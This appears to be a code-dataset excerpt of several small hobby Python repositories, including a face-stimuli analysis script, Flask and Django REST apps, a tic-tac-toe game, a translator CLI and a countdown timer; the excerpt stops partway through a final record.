"text": "from PIL import Image\n\n\"\"\"\ninstructions:\nconvert image.png -transparent white imageResult.png\n\ntasks to implement:\n1) loop through images and apply funcOne & funcTwo\n\"\"\"\ndef funcHead():\n\timage = 'test_face.png'\n\talpha_mask = 'test_mask.png'\n\tmsk = Image.open(alpha_mask)\n\timg = Image.open(image)\n\timg.paste(msk, (0,0), msk)\n\timg.save('test_result_head.png', 'PNG')\n\ndef funcEyes():\n\timage = 'test_face.png'\n\talpha_mask = 'test_eyes.png'\n\tmsk = Image.open(alpha_mask)\n\timg = Image.open(image)\n\timg.paste(msk, (0,0), msk)\n\timg.save('test_result_eyes.png', 'PNG')\n\n\n\n\t\t"
},
{
"alpha_fraction": 0.5428897142410278,
"alphanum_fraction": 0.56939297914505,
"avg_line_length": 26.629920959472656,
"blob_id": "118640281173621ffbaa111d8a313a4ad5651188",
"content_id": "6ed4b24d002286fad8caa11a7392c1497315900e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3509,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 127,
"path": "/stim_analysis_two.py",
"repo_name": "almasi771/face_stimuli",
"src_encoding": "UTF-8",
"text": "import csv\nimport pandas as pd\nfrom pandas import DataFrame\n\n#returns median number both for even or odd list\ndef median(time_list):\n\ttime_list = [int(i) for i in time_list]\n\tsorts = sorted(time_list) #convert a list of str to floats or ints\n\tlength = len(sorts)\n\tif not length%2:\n\t\treturn (sorts[length/2] + sorts[length/2-1]) / float(2)\n\treturn sorts[length/2]\n\ndef confusion_matrix(df_list, fan, age):\n\t# applied confusion matrix to given termins\n\t# ------------------------\n\t# | TP -> hits | FN |\n\t# ------------------------\n\t# | FP -> Fas | TN -> CRs |\n\t# ------------------------\n\n\t# structure of 2d list\n\t#[[TP, FN],[FP, TN]]\n\n\ttp_time = []\n\tfp_time = []\n\ttn_time = []\n\tmatrix = [[0,0],[0,0]]\n\n\tfor i in df_list:\n\t\tif i[0] == \"j\":\n\t\t\tif i[3] == fan and i[4] == age:\n\t\t\t\tif i[2] == i[5]:\n\t\t\t\t\t#TP\n\t\t\t\t\tmatrix[0][0] += 1\n\t\t\t\t\ttp_time.append(i[1])\n\t\t\t\telse:\n\t\t\t\t\t#FP\n\t\t\t\t\tmatrix[1][0] += 1\n\t\t\t\t\tfp_time.append(i[1])\n\n\t\tif i[0] == \"k\":\n\t\t\tif[3] == fan and i[4] == age:\n\t\t\t\tif i[2] == i[5]:\n\t\t\t\t\t#TN\n\t\t\t\t\tmatrix[1][1] += 1\n\t\t\t\t\ttn_time.append(i[1])\n\t\t\t\telse:\n\t\t\t\t\t#FN\n\t\t\t\t\tmatrix[0][1] += 1\n\t\n\tif fan == 'lf':\n\t\tif age == 'young':\n\t\t\tfinal = [\n\t\t\t\t\t\tfloat(matrix[0][0])/12,\n\t\t\t\t\t\tfloat(matrix[1][0])/12,\n\t\t\t\t\t\tmedian(tp_time),\n\t\t\t\t\t\t0#median(tn_time)\n\t\t\t\t\t]\n\t\telse:\n\t\t\tfinal = [\n\t\t\t\t\t\tfloat(matrix[0][0])/12,\n\t\t\t\t\t\tfloat(matrix[1][0])/12,\n\t\t\t\t\t\tmedian(tp_time),\n\t\t\t\t\t\t0#median(tn_time)\n\t\t\t\t\t]\n\tif fan == 'hf':\n\t\tif age == 'older':\n\t\t\tfinal = [\n\t\t\t\t\t\tfloat(matrix[0][0])/12,\n\t\t\t\t\t\tfloat(matrix[1][0])/12, \n\t\t\t\t\t\tmedian(tp_time),\n\t\t\t\t\t\t0#median(tn_time)\n\t\t\t\t\t]\n\t\telse:\n\t\t\tfinal = [\n\t\t\t\t\t\tfloat(matrix[0][0])/12,\n\t\t\t\t\t\tfloat(matrix[1][0])/12,\n\t\t\t\t\t\tmedian(tp_time),\n\t\t\t\t\t\t0#median(tn_time)\n\t\t\t\t\t]\t\n\t\n\t#final, TP, FP\n\treturn final, matrix[0][0], matrix[1][0]\n\ndef main():\n\t#subject's data\n\tsubject_data = list(csv.reader(open('/path/to/<file>.txt', 'rb'), delimiter='\\t'))\n\n\t#master data\n\tmaster_test = DataFrame(pd.read_csv('/path/to/<file>.csv'))\n\n\tdf_data = DataFrame(subject_data[584:775:2])\n\n\tdf_data = df_data.drop([x for x in range(13) if x not in (7,11)], axis=1)\n\tcols = ['resp', 'time']\n\tdf_data.columns = cols \n\n\t#j -> yes, k -> no\n\tdf_data['resp_cmp'] = [x.replace('j', 'old') for x in df_data['resp'].values.tolist()]\n\tdf_data['resp_cmp'] = [x.replace('k', 'new') for x in df_data['resp_cmp'].values.tolist()]\n\n\tdf_data['fan'] = master_test['fan']\n\tdf_data['status'] = master_test['age']\n\tdf_data['correct_test'] = master_test['test']\n\n\tyoung_hf_data, young_hf_tp_total, young_hf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='hf', age='young')\n\n\t\n\tyoung_lf_data, young_lf_tp_total, young_lf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='lf', age='young')\n\tyoung_hf_data, young_hf_tp_total, young_hf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='hf', age='young')\n\n\tolder_lf_data, older_lf_tp_total, older_lf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='lf', age='older')\n\tolder_hf_data, older_hf_tp_total, older_hf_fp_total = confusion_matrix(df_list=df_data.values.tolist(), fan='hf', age='older')\n\n\tout = csv.writer(open('/path/to/output/<file>.csv', 'w'), delimiter=',')\n\t\n\tout.writerow(\n\t\tsum(\n\t\t\t[young_lf_data, young_hf_data, older_lf_data, older_hf_data,\n\t\t\t\t[(young_lf_tp_total + young_hf_tp_total + older_lf_tp_total + older_hf_tp_total)/float(48)],\n\t\t\t\t[(young_lf_fp_total + young_hf_fp_total + older_lf_fp_total + older_hf_fp_total)/float(48)]\n\t\t\t], [])\n\t) \n\t\nif __name__ == '__main__':\n\tmain()\n"
}
] | 5 |
carlosviol/dj-kickstart | https://github.com/carlosviol/dj-kickstart | 6b0f2728a96c9dfee7d28ffe9319dae2ccf1c5cd | 030825c012e3e830be0beb0d1b73d3bc1d92edd5 | 1e50a3d08d69340bcbffbf4ea3e4a9375c79c622 | refs/heads/master | 2021-01-17T07:17:44.562998 | 2014-12-04T16:58:30 | 2014-12-04T20:56:00 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.532951295375824,
"alphanum_fraction": 0.7020057439804077,
"avg_line_length": 16.450000762939453,
"blob_id": "4f57bedab30c0c98093b2e8e56519ce43247ada1",
"content_id": "e1d95624e60a4a1884c52b29c177b3be03de87ee",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 349,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 20,
"path": "/requirements.txt",
"repo_name": "carlosviol/dj-kickstart",
"src_encoding": "UTF-8",
"text": "Django==1.7.1\nUnipath==1.0\ndj-database-url==0.3.0\ndj-static==0.0.6\ngunicorn==19.1.0\npsycopg2==2.5.1\npython-decouple==2.2\ndjango-reversion==1.8\ndjango_extensions==1.3.3\nWerkzeug==0.9.6\nipython==2.1.0\ndjango-jenkins==0.14.1\nclonedigger==1.1.0\ncoverage==3.7.1\nflake8==2.1.0\ndjango-nose==1.2\nnose==1.3.0\nnosexcover==1.0.8\npylint==1.1.0\nmodel-mommy==1.2\n"
},
{
"alpha_fraction": 0.734375,
"alphanum_fraction": 0.75,
"avg_line_length": 63,
"blob_id": "235e28ff47bacaa147846f3ef6fca4cffbb4159b",
"content_id": "d4a7c56abaa54d3689a7778c174fd79cb49a2dbd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 1,
"path": "/reports/README.txt",
"repo_name": "carlosviol/dj-kickstart",
"src_encoding": "UTF-8",
"text": "Reports made by quality analyzers, like as nose, pep8, flake...\n"
},
{
"alpha_fraction": 0.7226890921592712,
"alphanum_fraction": 0.7310924530029297,
"avg_line_length": 18.83333396911621,
"blob_id": "8e28bf1fe7c2b735f42dddb2cb29a79a990774c6",
"content_id": "d842db45d28cbbc47b08595b7eb5ecb80abebe7e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 119,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 6,
"path": "/project_name/core/views.py",
"repo_name": "carlosviol/dj-kickstart",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom django.shortcuts import render\n\n\ndef index(request):\n return render(request, 'core/base.html')\n"
}
] | 3 |
rassool-ahad/maktab52-group2 | https://github.com/rassool-ahad/maktab52-group2 | c03591e7333b7ffeec050ab21b76f0f84258195e | 2771c05547b30e345b045422e50fee57ced10b6f | 52ce5911fd6d7474407753fac8730a973f21a502 | refs/heads/master | 2023-05-10T11:03:43.812074 | 2021-06-04T13:35:35 | 2021-06-04T13:35:35 | 361,868,996 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5484962463378906,
"alphanum_fraction": 0.5518797039985657,
"avg_line_length": 38.68656539916992,
"blob_id": "aa933054b256fa72c93d5ace21cb523d857e1d77",
"content_id": "ae684509b1a04c0328b9692ba5b0752a4cd05e3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2660,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 67,
"path": "/Translators/main.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "\nfrom models.exceptions import *\n\ndef main():\n file_cashe = {}\n print('Welcome to my Translator ^_^')\n while True:\n command = input('\\n1.Translate New File\\n2.Translate Previous File\\n3.Save Translation\\n4.Exit\\n>>> ')\n if command == '1':\n path = input('\\n\\t<Open New File>\\n~$ ')\n if path in file_cashe:\n logging.warning('File Already has Read...')\n else:\n new_file = Translation(path)\n if new_file: file_cashe[path] = new_file\n\n elif command == '2':\n print('\\n\\t<Translating>\\nList of Files:', *file_cashe.keys(), sep = '\\n')\n path = input('\\n~$ ')\n try:\n file_cashe[path]\n except KeyError:\n logging.error('No File Match Search...')\n else:\n language = input('What Target Language Translation?(Enter for Persian) ').lower()[: 2] or 'fa'\n file_cashe[path].process(target_language = language)\n logging.debug('Successfully Translate.')\n\n elif command == '3':\n print('\\n\\t<Saving File Translate>\\nList of Files:', *file_cashe.keys(), sep='\\n')\n path = input('\\n~$ ')\n try:\n file_cashe[path]\n except KeyError:\n logging.error('No File Match Search...')\n else:\n name = input('Please Enter Your File Name: ')\n file_cashe[path].save_file(name)\n\n elif command == '4':\n logging.warning('Close Program.')\n break\n\n else:\n logging.error('Invalid Input! Try Again...')\n\nimport argparse, os\nparser = argparse.ArgumentParser(description = 'Translator')\nparser.add_argument('text', metavar = 'PATH', action = 'store', type = str, default = \"\", nargs='?',help = 'Path File')\nparser.add_argument('-t', '--to_lang', metavar='TO LANGUAGE', action='store', required= True, type=str, help='To Language')\nparser.add_argument('-f', '--from_lang', metavar='From Language', action='store', default = 'auto', help='From Language')\nparser.add_argument('-p', '--provider', metavar='PROVIDER', action='store', default = 'google', choices=['google', 'bing'])\nargs = parser.parse_args()\n\nif args.text == \"\":\n lines = []\n while True:\n try:\n line = input(\">>> \")\n lines.append(line + '\\n')\n except KeyboardInterrupt:\n break\n with open('example.txt','w') as f:\n f.writelines(lines)\n args.text = os.getcwd() + \"\\\\example.txt\"\n\ntrans = Translation(args.text)\nprint(trans.process(args.from_lang, args.to_lang, args.provider))\n"
},
{
"alpha_fraction": 0.6030927896499634,
"alphanum_fraction": 0.6030927896499634,
"avg_line_length": 20.086956024169922,
"blob_id": "f9d12b5c1999d7c31695becf316b5f304eecdebc",
"content_id": "0b966cffe540e71083249a2300e82da0508ddb38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 46,
"path": "/register/app.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request\n\n\nclass User:\n user_list = []\n\n def __init__(self, username, fname, lname, password):\n self.fname = fname\n self.lname = lname\n self.username = username\n self.password = password\n User.user_list.append(self)\n\n def info(self) -> str:\n return f\"id={User.user_list.index(self)}\\t{self.fname=}\\t{self.lname=}\\t{self.username=}\"\n\n\napp = Flask(__name__)\n\n\[email protected]('/', methods=['GET'])\ndef register():\n return render_template('register.html')\n\n\[email protected]('/', methods=['POST'])\ndef creat_user():\n form = request.form\n print(form)\n User(**form)\n return \"new user created\"\n\n\[email protected]('/<int:id>', methods=['GET'])\ndef show_user(id):\n u = User.user_list[id]\n return u.info()\n\n\[email protected]('/list', methods=['GET'])\ndef show_all_user():\n return render_template(\"show_all_users.html\", users=User.user_list)\n\n\nif __name__ == '__main__':\n app.run()\n"
},
{
"alpha_fraction": 0.5788352489471436,
"alphanum_fraction": 0.5960582494735718,
"avg_line_length": 41.992366790771484,
"blob_id": "3f72fad4477963ed0c1966f18d25fadf68f8041d",
"content_id": "ec1fca94abe235fde4e06004b2a3de02d159fd73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5632,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 131,
"path": "/xo/xo.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "from typing import Literal, Union, List\n\n\nclass _Player:\n def __init__(self, name: str, sign: Union[str, Literal['x', 'o']]) -> None:\n self.name = name\n self.sign = sign\n\n\nclass _XOTable:\n\n def __init__(self):\n self.xo_map = {k: None for k in range(1, 10)} # {1:x, 2: None, 3: o, ...}\n\n def __str__(self):\n map = self.xo_map\n return \"\"\"\n -----------------\n| {} | {} | {} |\n -----------------\n| {} | {} | {} |\n -----------------\n| {} | {} | {} |\n -----------------\n\"\"\".format(*[map[i] if map[i] else i for i in map])\n\n def mark_update(self, cell_no, sign: str):\n assert isinstance(cell_no, int) and 1 <= cell_no <= 9, \"Enter a valid cell no [1, 9]\"\n assert not self.xo_map[cell_no], \"Cell is filled\"\n sign = str(sign).lower()\n assert sign in 'xo', 'Invalid sign' + sign\n self.xo_map[cell_no] = sign\n\n\nclass _XOGame(_XOTable):\n class UnFinishedGameError(Exception):\n \"winner: zamani raise mishe k, bazi tamoom nashode bahe, vali winner() ...\"\n pass\n\n class FinishedGameError(Exception):\n \"mark: dar zamin k bazi tamoom shde ...\"\n pass\n\n class InvalidCellError(Exception):\n \"mark: Che por bashe, che addesh eshtabah bashe va ...\"\n pass\n\n class InvalidPlayer(Exception):\n \"mark: palyere voroodi eshtebah bashad!!!\"\n pass\n\n def __init__(self, player1: _Player, player2: _Player) -> None:\n super().__init__()\n self.player1, self.player2, self.table = player1, player2, _XOTable()\n\n def _calculate_result(self) -> str:\n win_list = [\"123\", \"456\", \"789\", \"147\", \"258\", \"369\", \"159\", \"357\"]\n for item in win_list:\n value_list = [self.table.xo_map[int(index)] for index in item if self.table.xo_map[int(index)]]\n if \"\".join(value_list) == \"xxx\" or \"\".join(value_list) == \"ooo\":\n return \"\".join(value_list)[0] # change true and false to player sign\n return \"\" # bool(empty str) == False\n\n def mark(self, cell_no, player: Union[_Player, Literal['x', 'o'], int]):\n if not 1 <= cell_no <= 9: # condition is reversed!\n raise self.InvalidCellError(cell_no, \"cell number is invalid\")\n if player == \"x\" or player == \"o\" or player == \"X\" or player == \"O\":\n player = self.player1 if self.player1.sign == player.lower() else self.player2 # lower sign player\n elif player == '1' or player == '2': # number 1 & 2 must be string because may be xo\n player = self.player1 if player == '1' else self.player2\n elif player == self.player1.name or player == self.player2.name: # get player with name\n player = self.player1 if player == self.player1.name else self.player2\n else:\n raise self.InvalidPlayer(player, \"invalid player\")\n self.table.mark_update(cell_no, player.sign) # table is self attribute so table change to self.table\n print(self.table)\n\n def winner(self):\n res = self._calculate_result() # res = 'x' or res = 'o' or res = ''\n # if not res and None in self.table.xo_map.values(): # check winner before end game round raise Exception\n # raise self.UnFinishedGameError(\"The Game has not Finished yet!...\")\n if res: # if res != ''\n return self.player1 if res == self.player1.sign else self.player2 # find winner player sign\n elif not res and None not in self.table.xo_map.values():\n return None\n return False\n\n\nplayer1_name = input(\"Please Enter Your Name:\")\nplayer1_sign = input(\"Please Enter Your Sign:\").lower()\nplayer1 = _Player(player1_name, player1_sign)\nplayer2_name = input(\"Please Enter Your Name:\")\nplayer2_sign = 'o' if player1_sign == 'x' else 'x' # auto sign for player2\nplayer2 = _Player(player2_name, player2_sign) # player1_name to player2_name\n\nwinner_dict = {player1: 0, player2: 0}\ngame: List[any] = [None for i in range(3)]\nfor game_round in range(3):\n game[game_round], winner = _XOGame(player1, player2), False # winner before loop must defined\n turn_player = player1 if not game_round % 2 else player2 # Change First Player Every Round\n while winner is False: # winner is None and not equal players\n turn = input(f\"Please Enter A Cell Number and Your Mark(Or Just Cell Number for {turn_player.name} turn):\")\n try: # get cell number and player\n num, sign = turn.split(\" \")\n except: # get just cell number for suggested player\n num = turn\n sign = turn_player.sign\n try: # handling exceptions in mark method\n game[game_round].mark(int(num), sign) # cell_no must be integer not string\n turn_player = player1 if turn_player == player2 else player2 # change turn if current turn\n except:\n print('\\nTry Again...!\\n')\n\n try: # winner = player1 or player2\n winner = game[game_round].winner()\n except:\n pass # handling UnFinishedGameError and winner is None yet\n\n if isinstance(winner, _Player):\n winner_dict[winner] += 1\n print(f\"\\n{game_round + 1}th Round finished. This Round Winner Is {winner.name}\\n\")\n\n if winner is None:\n print(f\"\\n{game_round + 1}th Round finished. This Round Is A Tie\\n\")\n\nwinner_dict_values = list(winner_dict.values())\nif winner_dict_values[0] != winner_dict_values[1]:\n winner_dict_reverse = {v: k for k, v in winner_dict.items()}\n print(f\"The Winner IS: {winner_dict_reverse[sorted(winner_dict_reverse.keys())[1]].name}\") # print player.name\nelse:\n print(\"This Game Is A Tie\")\n"
},
{
"alpha_fraction": 0.542559027671814,
"alphanum_fraction": 0.5453047752380371,
"avg_line_length": 36.14285659790039,
"blob_id": "bf5258676623918181aed8ab1097bc65c12ac38f",
"content_id": "3cbbd99e826715c5f92fb80a6a2592b88b94dc38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1821,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 49,
"path": "/Translators/models/exceptions.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "\nimport logging, translators as ts\n\nlogging.basicConfig(level = logging.INFO, format = '%(asctime)s - %(levelname)-10s - %(message)s')\n\nclass Translation:\n def __new__(cls, file_path: str):\n try:\n open(file_path)\n except FileNotFoundError:\n logging.error('No File Match Search...')\n except:\n logging.error('Invalid Path!!')\n else:\n return super().__new__(cls)\n\n def __init__(self, file_path: str):\n self.path = file_path\n with open(self.path, encoding = 'utf-8') as fl:\n self.text = fl.readlines()\n logging.info('Successfully Read File.')\n\n def process(self, from_lang = 'auto', target_language = 'fa', pro = 'google'):\n self.translated = []\n try:\n for line in self.text:\n self.translated.append(getattr(ts, pro)(line, from_language = 'auto', to_language = target_language))\n except: logging.error('Invalid Language! Pay Attention to Language in the Google Translate...')\n print(*self.translated, sep = '\\n')\n return self.translated\n\n def save_file(self, file_name: str):\n try:\n fl = open('\\\\'.join(self.path.split('\\\\')[: -1]) + '\\\\' + file_name, 'x', encoding = 'utf-8')\n except FileExistsError:\n logging.warning('File has Existed...')\n except:\n logging.error('File Name Must be is a String.')\n else:\n try:\n translate = self.translated\n except AttributeError:\n translate = self.process()\n finally:\n with fl:\n print(*translate, sep = '\\n', file = fl)\n logging.info('Saved Content into the File!')\n\n def __repr__(self):\n return f\"File at {self.path} Location.\"\n"
},
{
"alpha_fraction": 0.5586914420127869,
"alphanum_fraction": 0.5695958733558655,
"avg_line_length": 38.97435760498047,
"blob_id": "08bdd50b0482743017b1a1c81b5a0898ffe8b71c",
"content_id": "657ef6d08be9b69f02ec8f8e3581db5aeae0b426",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1559,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 39,
"path": "/CountDown.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "#Rasool Ahadi - Reza Gholami - Sepehr Bazyar\nimport datetime, time, argparse\n\nparser = argparse.ArgumentParser(description = \"It's Countdown App\")\nparser.add_argument(\"time\", type = str, action = \"store\", default = None , nargs = \"?\")\nparser.add_argument(\"-ss\", \"--sec\", type = int, action = \"store\", metavar = \"SECONDS\", default = 0)\nparser.add_argument(\"-mm\", \"--min\", type = int, action = \"store\", metavar = \"MINUTE\", default = 0)\nparser.add_argument(\"-hh\", \"--hour\", type = int, action = \"store\", metavar = \"HOUR\", default = 0)\nargs = parser.parse_args()\n\nif args.time:\n date = str(datetime.datetime.now().date())\n countdown_start = datetime.datetime.fromisoformat(date + \" \"+ args.time) - datetime.datetime.now()\n while True:\n try:\n print(countdown_start)\n time.sleep(1)\n countdown_start -= datetime.timedelta(seconds = 1)\n if countdown_start.total_seconds() < 1:\n print(\"Timeps UP!!\")\n break\n except KeyboardInterrupt:\n print(\"Fineshed!!\")\n break\n\nelse:\n date = str(datetime.datetime.now().date())\n ti = datetime.datetime.fromisoformat(date +f\" {args.hour:02}:{args.min:02}:{args.sec:02}\")\n while True:\n try:\n print(ti)\n ti -= datetime.timedelta(seconds = 1)\n time.sleep(1)\n if ti.time().second == 0 and ti.time().minute == 0 and ti.time().hour == 0:\n print(\"Times UP!!\")\n break\n except KeyboardInterrupt:\n print(\"Fineshed!!\")\n break\n"
}
] | 5 |
EunkyoungJung/practice_drf | https://github.com/EunkyoungJung/practice_drf | 182a5a20865b577ff40e1a0cea2e1158843cd455 | 47d7a7f2d823a1d87733278ff83d03f88169c832 | 96ab2a0efb15a24c4abb264f704f7ebdc83705f7 | refs/heads/master | 2021-05-20T08:16:19.828970 | 2020-04-02T04:18:48 | 2020-04-02T04:18:48 | 252,189,655 | 0 | 0 | null | 2020-04-01T13:55:15 | 2020-04-02T02:22:51 | 2020-04-02T04:18:49 | Python | [
{
"alpha_fraction": 0.7821782231330872,
"alphanum_fraction": 0.7821782231330872,
"avg_line_length": 19.200000762939453,
"blob_id": "d265ec70f6eadb31df30eb745888de70e15147a3",
"content_id": "efb3c607066a02ad5eda4ec7f6d81dfc2de13934",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 5,
"path": "/flighttracker/apps.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass FlighttrackerConfig(AppConfig):\n name = 'flighttracker'\n"
},
{
"alpha_fraction": 0.688622772693634,
"alphanum_fraction": 0.7045907974243164,
"avg_line_length": 34.71428680419922,
"blob_id": "787d57c56eedc0c632f382e0d0ca67ed8654c22d",
"content_id": "afb2d24f6b1ab40478bafb089bc9d34431134f93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 501,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 14,
"path": "/order/models.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Customer(models.Model):\n firstName = models.CharField(max_length=20)\n lastName = models.CharField(max_length=20)\n phone_number = models.CharField(max_length=20)\n\n def __str__(self):\n return self.firstName + \" \" + self.lastName\n\nclass Order(models.Model):\n product = models.CharField(max_length=20)\n quantity = models.SmallIntegerField()\n customer = models.ForeignKey(Customer, related_name=\"customers\", on_delete=models.CASCADE)\n\n"
},
{
"alpha_fraction": 0.7166064977645874,
"alphanum_fraction": 0.7193140983581543,
"avg_line_length": 30.514286041259766,
"blob_id": "ba05a04fddd79c70a655b70484bc0a6b379189dc",
"content_id": "13216c32cd399fbf3b1d4a460f7cb262cce31001",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1108,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 35,
"path": "/course/views.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "#from django.http import Http404\n\n#from rest_framework import status\n#from rest_framework.response import Response\n#from rest_framework.views import APIView\nfrom rest_framework import generics, mixins\n\nfrom new_course.models import Course\nfrom new_course.serializers import CourseSerializer\n\nclass CourseList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n\n def get(self, request):\n return self.list(request)\n\n def post(self, request):\n return self.create(request)\n\nclass CourseDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n\n def get(self, pk):\n return self.retrieve(request,pk)\n\n def put(self, request, pk):\n return self.retrieve(request, pk)\n\n def put(self, request, pk):\n return self.update(request, pk)\n\n def delete(self, request, pk):\n return self.destroy(request, pk)\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7699999809265137,
"alphanum_fraction": 0.7699999809265137,
"avg_line_length": 19,
"blob_id": "15704645b81651ec3938ce61e091a24a369ee267",
"content_id": "840800f1bfaee576e7103180704d3c918861755c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 100,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 5,
"path": "/newest_course/apps.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass NewestCourseConfig(AppConfig):\n name = 'newest_course'\n"
},
{
"alpha_fraction": 0.775086522102356,
"alphanum_fraction": 0.7802768349647522,
"avg_line_length": 33,
"blob_id": "6be0ddb004e516541566d55cb35824b7b32bf617",
"content_id": "f77550a54d11fef1fc63d0a2ed3eb08596088441",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 578,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 17,
"path": "/newer_course/views.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "#from django.http import Http404\n\n#from rest_framework import status\nfrom rest_framework.response import Response\n#from rest_framework.views import APIView\nfrom rest_framework import generics, mixins\n\nfrom newer_course.models import Course\nfrom newer_course.serializers import CourseSerializer\n\nclass CourseList(generics.ListCreateAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n\nclass CourseDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n"
},
{
"alpha_fraction": 0.7961538434028625,
"alphanum_fraction": 0.7961538434028625,
"avg_line_length": 31.25,
"blob_id": "2239ee0437a7f14862c256b460049e561c6ad520",
"content_id": "76bb56f92586a49a679bdf7a425d6de7f1d7e784",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 8,
"path": "/newest_course/views.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from rest_framework import viewsets\n\nfrom newest_course.models import Course\nfrom newest_course.serializers import CourseSerializer\n\nclass CourseViewSet(viewsets.ModelViewSet):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n\n\n"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 27.538461685180664,
"blob_id": "3f03c68402515d3c0fd869807a4cf28520bc4e32",
"content_id": "06d0e09f8111ce5d6af5706a88b95ee1d75f372c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 13,
"path": "/order/serializers.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from .models import Customer, Order\nfrom rest_framework import serializers\n\nclass CustomerSerializer(serializers.ModelSerializer):\n class Meta:\n model=Customer\n fields='__all__'\n\nclass OrderSerializer(serializers.ModelSerializer):\n customers = CustomerSerializer(read_only=True, many=True)\n class Meta:\n model=Order\n fields='__all__'\n\n\n\n"
},
{
"alpha_fraction": 0.7553191781044006,
"alphanum_fraction": 0.7553191781044006,
"avg_line_length": 17.799999237060547,
"blob_id": "b41daefdcbaae575dead88280a3bcd098eaa97b3",
"content_id": "bdcb54b4e74ee382a39c9292f7e5381f950d759a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/new_course/apps.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass NewCourseConfig(AppConfig):\n name = 'new_course'\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6642857193946838,
"avg_line_length": 41,
"blob_id": "a21a3a1a45a1fc7bac8d22cd0eba28d4666477b5",
"content_id": "24c15e86aafa41b7c66d08d253c3a27239cb7ef4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 10,
"path": "/newer_course/models.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
